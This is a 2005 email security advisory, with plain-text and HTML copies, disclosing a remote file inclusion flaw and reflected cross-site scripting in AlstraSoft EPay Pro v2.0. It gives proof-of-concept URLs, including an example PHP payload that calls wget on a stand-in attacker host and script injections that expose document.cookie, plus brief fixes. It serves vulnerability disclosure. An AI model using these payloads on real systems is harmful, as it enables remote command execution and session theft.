AlstraSoft20.txt

`This is a multi-part message in MIME format.  
  
------=_NextPart_000_0012_01C53726.5C0BF6A0  
Content-Type: text/plain;  
charset="iso-8859-1"  
Content-Transfer-Encoding: quoted-printable  
  
-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
Dcrab 's Security Advisory  
[Hsc Security Group] http://www.hackerscenter.com/  
[dP Security] http://digitalparadox.org/  
  
Severity: High  
Title: AlstraSoft EPay Pro v2.0 has file include and multiple xss =  
vulnerabilities  
Date: 02/04/2005  
  
Vendor: AlstraSoft  
Vendor Website: http://www.alstrasoft.com  
Summary: Alstrasoft epay pro v2. has file include and multiple xss =  
vulnerabilities.  
  
Proof of Concept Exploits:=20  
  
http://localhost/epal/index.php?view=3Dhttp://www.whatismyip.com?  
File include vulnerability  
  
Instead of www.whatismyip.com if we replaced that with suppose evil.php =  
on www.server.com which contained evil code such as  
<?  
system('wget http://www.hacker.com");  
?>  
and we ran, =  
http://localhost/epal/index.php?view=3Dhttp://www.server.com/evil it =  
would execute the command and thus this can lead to arbitary command =  
execution.  
  
  
http://localhost/epal/?order_num=3Dcrap&payment=3D"><script>alert(documen=  
t.cookie)</script>&send=3Dfirst&send=3Dregular&send=3Dpriority&send=3Dexp=  
ress  
Pops cookie  
  
  
http://localhost/epal/?order_num=3Dcrap&payment=3Dcrap&send=3Dfirst&send=3D=  
regular&send=3Dpriority&send=3D'%3E%3Cscript%3Ealert(document.cookie)%3C/=  
script%3E  
Pops cookie  
  
  
Possible Fixes: The usage of htmlspeacialchars(), and using a base =  
directory for file include would solve these problems.  
  
Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah  
  
Author:=20  
These vulnerabilties have been found and released by Diabolic Crab, =  
Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to =  
contact me regarding these vulnerabilities. You can find me at, =  
http://www.hackerscenter.com or http://digitalparadox.org/. Lookout for =  
my soon to come out book on Secure coding with php.  
  
Diabolic Crab's Security Services: Contact at =  
dcrab[NOSPAM|AT]hackerscenter[NOSPAM|DOT]COM for Php auditing and web =  
application securing services, along with programming in php, vb, asp, =  
c, c++, perl, java, html and graphic designing.  
  
-----BEGIN PGP SIGNATURE-----  
Version: PGP 8.1 - not licensed for commercial use: www.pgp.com  
  
iQA/AwUBQk2p4SZV5e8av/DUEQIWsQCfW213hHs/Bd4QZBoLFufN1NM+AkUAn3Xd  
vW9dOgM7AoFDa/JaMgMjaisw  
=3Dsb0J  
-----END PGP SIGNATURE-----  
  
  
------=_NextPart_000_0012_01C53726.5C0BF6A0  
Content-Type: text/html;  
charset="iso-8859-1"  
Content-Transfer-Encoding: quoted-printable  
  
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">  
<HTML><HEAD>  
<META http-equiv=3DContent-Type content=3D"text/html; =  
charset=3Diso-8859-1">  
<META content=3D"MSHTML 6.00.2900.2604" name=3DGENERATOR>  
<STYLE></STYLE>  
</HEAD>  
<BODY bgColor=3D#ffffff>  
<DIV><FONT face=3DArial size=3D2>-----BEGIN PGP SIGNED =  
MESSAGE-----<BR>Hash:=20  
SHA1</FONT></DIV>  
<DIV>&nbsp;</DIV>  
<DIV><FONT face=3DArial size=3D2>Dcrab 's Security Advisory<BR>[Hsc =  
Security Group]=20  
<A =  
href=3D"http://www.hackerscenter.com/">http://www.hackerscenter.com/</A><=  
BR>[dP=20  
Security] <A=20  
href=3D"http://digitalparadox.org/">http://digitalparadox.org/</A></FONT>=  
</DIV>  
<DIV>&nbsp;</DIV>  
<DIV><FONT face=3DArial size=3D2>Severity: High<BR>Title: AlstraSoft =  
EPay Pro v2.0=20  
has file include and multiple xss vulnerabilities<BR>Date:=20  
02/04/2005</FONT></DIV>  
<DIV>&nbsp;</DIV>  
<DIV><FONT face=3DArial size=3D2>Vendor: AlstraSoft<BR>Vendor Website: =  
<A=20  
href=3D"http://www.alstrasoft.com">http://www.alstrasoft.com</A><BR>Summa=  
ry:=20  
Alstrasoft epay pro v2. has file include and multiple xss=20  
vulnerabilities.</FONT></DIV>  
<DIV>&nbsp;</DIV>  
<DIV><FONT face=3DArial size=3D2>Proof of Concept Exploits: =  
</FONT></DIV>  
<DIV>&nbsp;</DIV>  
<DIV><FONT face=3DArial size=3D2><A=20  
href=3D"http://localhost/epal/index.php?view=3Dhttp://www.whatismyip.com"=  
>http://localhost/epal/index.php?view=3Dhttp://www.whatismyip.com</A>?<BR=  
>File=20  
include vulnerability</FONT></DIV>  
<DIV>&nbsp;</DIV>  
<DIV><FONT face=3DArial size=3D2>Instead of <A=20  
href=3D"http://www.whatismyip.com">www.whatismyip.com</A> if we replaced =  
that with=20  
suppose evil.php on <A href=3D"http://www.server.com">www.server.com</A> =  
which=20  
contained evil code such as<BR><?<BR>system('wget <A=20  
href=3D"http://www.hacker.com">http://www.hacker.com</A>");<BR>?><BR>a=  
nd we=20  
ran, <A=20  
href=3D"http://localhost/epal/index.php?view=3Dhttp://www.server.com/evil=  
">http://localhost/epal/index.php?view=3Dhttp://www.server.com/evil</A>=20  
it would execute the command and thus this can lead to arbitary command=20  
execution.</FONT></DIV>  
<DIV>&nbsp;</DIV><FONT face=3DArial size=3D2>  
<DIV><BR><A=20  
href=3D'http://localhost/epal/?order_num=3Dcrap&payment=3D"><script>a=  
lert(document.cookie)</script>&send=3Dfirst&send=3Dregular&se=  
nd=3Dpriority&send=3Dexpress'>http://localhost/epal/?order_num=3Dcrap=  
&payment=3D"><script>alert(document.cookie)</script>&a=  
mp;send=3Dfirst&send=3Dregular&send=3Dpriority&send=3Dexpress=  
</A><BR>Pops=20  
cookie</DIV>  
<DIV>&nbsp;</DIV>  
<DIV><BR><A=20  
href=3D"http://localhost/epal/?order_num=3Dcrap&payment=3Dcrap&se=  
nd=3Dfirst&send=3Dregular&send=3Dpriority&send=3D'%3E%3Cscrip=  
t%3Ealert(document.cookie)%3C/script%3E">http://localhost/epal/?order_num=  
=3Dcrap&payment=3Dcrap&send=3Dfirst&send=3Dregular&send=3D=  
priority&send=3D'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E</=  
A><BR>Pops=20  
cookie</DIV>  
<DIV>&nbsp;</DIV>  
<DIV><BR>Possible Fixes: The usage of htmlspeacialchars(), and using a =  
base=20  
directory for file include would solve these problems.</DIV>  
<DIV>&nbsp;</DIV>  
<DIV>Keep your self updated, Rss feed at: <A=20  
href=3D"http://digitalparadox.org/rss.ah">http://digitalparadox.org/rss.a=  
h</A></DIV>  
<DIV>&nbsp;</DIV>  
<DIV>Author: <BR>These vulnerabilties have been found and released by =  
Diabolic=20  
Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel =  
free to=20  
contact me regarding these vulnerabilities. You can find me at, <A=20  
href=3D"http://www.hackerscenter.com">http://www.hackerscenter.com</A> =  
or <A=20  
href=3D"http://digitalparadox.org/">http://digitalparadox.org/</A>. =  
Lookout for my=20  
soon to come out book on Secure coding with php.</DIV>  
<DIV>&nbsp;</DIV>  
<DIV>Diabolic Crab's Security Services: Contact at=20  
dcrab[NOSPAM|AT]hackerscenter[NOSPAM|DOT]COM for Php auditing and web=20  
application securing services, along with programming in php, vb, asp, =  
c, c++,=20  
perl, java, html and graphic designing.</DIV>  
<DIV>&nbsp;</DIV>  
<DIV>-----BEGIN PGP SIGNATURE-----<BR>Version: PGP 8.1 - not licensed =  
for=20  
commercial use: <A href=3D"http://www.pgp.com">www.pgp.com</A></DIV>  
<DIV>&nbsp;</DIV>  
<DIV>iQA/AwUBQk2p4SZV5e8av/DUEQIWsQCfW213hHs/Bd4QZBoLFufN1NM+AkUAn3Xd<BR>=  
vW9dOgM7AoFDa/JaMgMjaisw<BR>=3Dsb0J<BR>-----END=20  
PGP SIGNATURE-----<BR></FONT></DIV>  
<DIV><FONT face=3DArial size=3D2></FONT>&nbsp;</DIV></BODY></HTML>  
  
------=_NextPart_000_0012_01C53726.5C0BF6A0--  
`